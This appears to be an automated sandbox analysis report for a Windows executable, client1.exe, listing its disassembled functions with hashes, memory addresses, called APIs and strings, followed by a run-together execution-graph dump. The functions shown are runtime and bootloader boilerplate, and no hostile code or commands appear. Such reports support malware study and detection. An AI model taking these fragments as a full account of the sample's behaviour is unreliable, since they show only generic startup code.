                                                    • Instruction ID: 54e04fc50cd6634a31d28a0e04e6114a808eb9d4249d7a0ded5da86cd2ab78ff
                                                    • Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                    • Instruction Fuzzy Hash: 9E113B28E0D3C242FA747B315A811FAE25B5F55BB0F844734D83E17AD6DEADB402A630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction ID: 8982f06502d7dfab5b13709e126607f1b10cb27aac9b01bbc65d27bf8337a259
                                                    • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction Fuzzy Hash: C251C932B0578286D724EB35E8046E9B77AFB44BA4F908130DE6A87789DF38E941C751
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    • API String ID: 3081866767-2699770090
                                                    • Opcode ID: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                    • Instruction ID: 75cbf9dd7fa8ae9d9d2df12f7b1f021d5dba8617397ec20490fe5290584012cd
                                                    • Opcode Fuzzy Hash: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                    • Instruction Fuzzy Hash: D3316B32A08BC289EB20FF71E8451E9A36AFF88794F800135EA5D8BA55DF7CD145C711
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F6274B0: GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                      • Part of subcall function 00007FF79F6274B0: FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MessageBoxA.USER32 ref: 00007FF79F622748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 2806210788-2410924014
                                                    • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction ID: 427f49a35eef2caea9a4960fb05762d764c75c52f36becf58bf441f8cbd09b05
                                                    • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction Fuzzy Hash: 8631747262C7C291E630BB20E8517DAA36AFB84794FC04036E69D43A99DF3CD305CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction ID: 46445f8685af585de1a2bd3e6bf8cc80228188c3258e4f9d9d5d6f64c18f88db
                                                    • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction Fuzzy Hash: 10F0AF71A0978291EA30BB34A8843B9932AAF897B5FC40235C57D466E4CF6CD448C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction ID: 994d73378fc6788d0adf3b655954d8948b8ff5b4b35ccd91aa673180338e089c
                                                    • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction Fuzzy Hash: 3811CE32E58B8705F6B43138E4523F9944B6F593F4F880230EA7E06AE6DF2CAC614275
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A87F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A89E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8C6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8D7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                    • Instruction ID: 87755686d646a12ca7cb0f6417ada6b8332a2dd90d1f76302ff083e3e3c9446f
                                                    • Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                    • Instruction Fuzzy Hash: 27114C24E1C3C241FA78B335AA411FAE24B5F557B0F844334E87E566D6DEADB4429630
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A705
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A724
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A74C
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A75D
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A76E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                    • Instruction ID: 9076ae7c84df3867ed5b9104e1184d68ed80a24e79805a6537f48b8d8785659b
                                                    • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                    • Instruction Fuzzy Hash: 51112A28E0C38301F978BB7148921FA92AB4F56770F840734D83E4A6D2DDADB441A631
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction ID: 1542419fdd7386e72493200d0f49359441f601781debbe21f9e69f7a4f0e499c
                                                    • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction Fuzzy Hash: EC81C731D2C38285F7787E3D89402F8B69AAF11B48FD58035DA2D9B286CFBDE4059361
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction ID: a7dcd6674dd98766165323c66a314b684f0f5cf4b64d6333bf91d0467ab5d1a8
                                                    • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction Fuzzy Hash: 90617C32A08B858AE720AF75D8803EDB7A5FB54B88F544235EE9D57B98CF38E045C711
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction ID: 89e6ea3a9b9764ae6a7bd996ea31cba2f5743fa1988ae6ff5b57a3f20f2b1cbe
                                                    • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction Fuzzy Hash: 1151B3329087C286DB74AF2199402E8B7AAFB64B94F944135DAAC87BD5CF3CE450C712
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction ID: 5e41e6416dcbca17ebcc084aa2b1602857236b40ea0d1787d6511593137c4f44
                                                    • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction Fuzzy Hash: C83174726287C191EA30BB20E4517DAA36AFB84784FC04035EA9D47A89DF3CD305CB50
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction ID: 64e40b5f08e71e9dbc1b1938ebb9efc0a48c75c8d0abd793f5d21a7513db45bc
                                                    • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction Fuzzy Hash: 0701BC21B1C3C290FA30BB30EC523F9925BBF08394FC00535E86EC6682EE5CE1459621
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction ID: f573e26b156dbeec8fe4ddbf6412b31814c1fa5a6ee9b81dedc133e0dd9b5fc8
                                                    • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction Fuzzy Hash: 7ED1E022B18B8189E720DF79D4402EC77BAFB847D8B804225DE6E97B99DE78D416C310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction ID: d3e74ef10bdee7ac3501ca7d7d83abf59f251e85485275c8c19478c86165f97c
                                                    • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction Fuzzy Hash: 5711EC21E1C3C241FA71BB79E9442F99297EF89790FC44030E96947B8DDE2CD5C14111
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    • Opcode ID: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                    • Instruction ID: 3225b170cf9919eee0b2f84586cb995d08a99e14da07d48812648177800a96ba
                                                    • Opcode Fuzzy Hash: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                    • Instruction Fuzzy Hash: 4D41D613A087C255FB74BB3594023FAA6AAEF81BA4FA44235EF6C07AD5DE3CD4518710
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F637E9E
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79F62B105), ref: 00007FF79F637EBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\client1.exe
                                                    • API String ID: 3580290477-3981961939
                                                    • Opcode ID: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                    • Instruction ID: c7243760c77a5a2ba2524ef3bb143f7c618380d230a22ee2f67c0ac2cee44451
                                                    • Opcode Fuzzy Hash: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                    • Instruction Fuzzy Hash: 27415F32A08B9285EB24FF35D4800F8A7AAFF45794BD44039E96E43B85EF7DE4418760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction ID: d8288a821d60d807d24e101a889977289f27ecd64d153d6bd9ca5533d84db7b9
                                                    • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction Fuzzy Hash: 6941BF22A18B8186EB30AF65E8443E9B7AAFB88794F804131EE5D87798DF7CD441C750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                    • Instruction ID: a1c1ac3e35cef5dca5b2dffa328874262bdb24a07ee44c6fa033a46e3c123853
                                                    • Opcode Fuzzy Hash: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                    • Instruction Fuzzy Hash: CC21E362A087C281EB30AB21D4542ADB3BBFB94B84FC54035C6AC43284DFBDE5498771
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction ID: 05cd645ff5f888422db5e4e7115e06dcb47c015c2c7129efa72a60483e0df11d
                                                    • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction Fuzzy Hash: 792153726287C291FA30AB20F4517EAA359FB84788FC05135EA9D47A95DF3CD205C751
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction ID: 79b571e26da2bfd48c070471a7e58d0411b39622869149dfb16ba3604a0de879
                                                    • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction Fuzzy Hash: 3C21B5726287C291EB30BB20F8517EAA359FB84788FC00135E69D47A95DF3CD205C751
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction ID: 9d94cc3acb5f3c85cba13d30bb3129c537d7161fd2bf0c3510a608b2a8661950
                                                    • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction Fuzzy Hash: 6B115432618B8182EB219F25F5402D9B7A9FB88B94F584234EF9C47754DF3DD551C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction ID: f6a196918b46ec67a83ca2aae2117e4ea2a4506a7808c67bb6a2d9dc34037f39
                                                    • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction Fuzzy Hash: 2601D42292C38286FB35BF74A8612FEA3A9EF44708FC41135D56C82285DF6CE544DA24

                                                    Execution Graph

                                                    Execution Coverage:1.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:823
                                                    Total number of Limit Nodes:22
96902->97001 96903 7ff79f6249ec 96903->96902 97012 7ff79f622770 59 API calls 2 library calls 96903->97012 96910 7ff79f6230be 96904->96910 96905 7ff79f624a59 97007 7ff79f6271b0 96905->97007 96906->96905 97013 7ff79f622770 59 API calls 2 library calls 96906->97013 96910->96698 96919 7ff79f624ce0 96910->96919 96912 7ff79f624a66 96914 7ff79f624a6b 96912->96914 96915 7ff79f624a8d 96912->96915 97014 7ff79f622620 57 API calls 2 library calls 96914->97014 97015 7ff79f623df0 112 API calls 96915->97015 96918 7ff79f6271b0 58 API calls 96918->96897 96920 7ff79f626990 61 API calls 96919->96920 96922 7ff79f624cf5 96920->96922 96921 7ff79f624d10 96923 7ff79f627a30 57 API calls 96921->96923 96922->96921 97043 7ff79f622880 59 API calls 2 library calls 96922->97043 96925 7ff79f624d54 96923->96925 96926 7ff79f624d59 96925->96926 96927 7ff79f624d70 96925->96927 97044 7ff79f622770 59 API calls 2 library calls 96926->97044 96930 7ff79f627a30 57 API calls 96927->96930 96929 7ff79f624d65 96929->96700 96932 7ff79f624da5 96930->96932 96934 7ff79f621b30 49 API calls 96932->96934 96945 7ff79f624daa __std_exception_copy 96932->96945 96933 7ff79f624f51 96933->96700 96935 7ff79f624e27 96934->96935 96936 7ff79f624e2e 96935->96936 96937 7ff79f624e53 96935->96937 97045 7ff79f622770 59 API calls 2 library calls 96936->97045 96938 7ff79f627a30 57 API calls 96937->96938 96941 7ff79f624e6c 96938->96941 96940 7ff79f624e43 96940->96700 96941->96945 97016 7ff79f624ac0 96941->97016 96946 7ff79f624f3a 96945->96946 97047 7ff79f622770 59 API calls 2 library calls 96945->97047 96946->96700 96948 7ff79f6246f7 96947->96948 96948->96948 96949 7ff79f624720 96948->96949 96956 7ff79f624737 __std_exception_copy 96948->96956 